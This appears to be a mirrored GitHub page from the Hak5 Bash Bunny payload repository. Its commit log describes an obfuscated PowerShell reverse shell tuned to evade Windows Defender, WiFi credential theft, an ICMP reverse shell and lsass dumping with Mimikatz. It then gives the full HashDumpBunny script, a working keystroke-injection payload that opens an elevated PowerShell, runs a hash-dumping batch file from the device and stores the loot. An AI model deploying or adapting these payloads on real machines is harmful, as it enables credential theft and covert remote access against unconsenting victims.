mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
5eaf7d9dc7
* Uploaded ReverseBunny
Obfuscated reverse shell via powershell
* Uploaded WifiSnatch
Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt
Changed payload to evade Windows Defender
* Update payload.txt
Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt
Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2
Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design
* Updated ReverseBunny to version 1.2
Updated README for ReverseBunny update
* Updated payload
fixed some stupid left overs <3
* Uploaded pingUinBunny
a reverse shell using icmp
* Delete payloads/library/remote_access/switch1 directory
* Uploaded pingUinBunny
A reverse shell using icmp
* Update README.md
* Update README.md
* Updated to PingZhell
* Update Bunny.pl
* Update README.md
* Update README.md
* Update payload.txt
* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl
* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md
* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt
* Update payload.txt
* Update README.md
* Update README.md
* Update Bunny.pl
* Created ProcDumpBunny
Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz
* Update README.md
* Update payload.txt
* Updated ReverseBunny
Fixed wrong DELAY commands
* Updated PingZhellBunny
Fixed wrong DELAY commands
* Updated WifiSnatch
Fixed multiple mistakes
* Uploaded HashDumpBunny
Use your BashBunny to dump the user hashes of your target - similar to the msf post-module.
The script was obfuscated with multiple layers, so don't be confused.
If you don't trust this script, run it within a save testing space - which should be best practice anyways ;)
* added example picture
* Update README.md
44 lines
1.1 KiB
Bash
44 lines
1.1 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: HashDumpBunny
|
|
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
|
# Author: 0iphor13
|
|
# Version: 1.0
|
|
# Category: Credentials
|
|
# Attackmodes: HID, Storage
|
|
|
|
LED SETUP
|
|
|
|
Q DELAY 500
|
|
|
|
GET SWITCH_POSITION
|
|
DUCKY_LANG de
|
|
|
|
Q DELAY 500
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
|
|
|
LED STAGE1
|
|
|
|
#After you have adapted the delays for your target, add "-W hidden"
|
|
Q DELAY 1000
|
|
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
Q ALT j
|
|
Q DELAY 250
|
|
|
|
Q DELAY 250
|
|
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
|
|
Q DELAY 250
|
|
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
|
Q DELAY 250
|
|
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
|
Q DELAY 250
|
|
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
|
Q DELAY 300
|
|
Q ENTER
|
|
|
|
LED FINISH |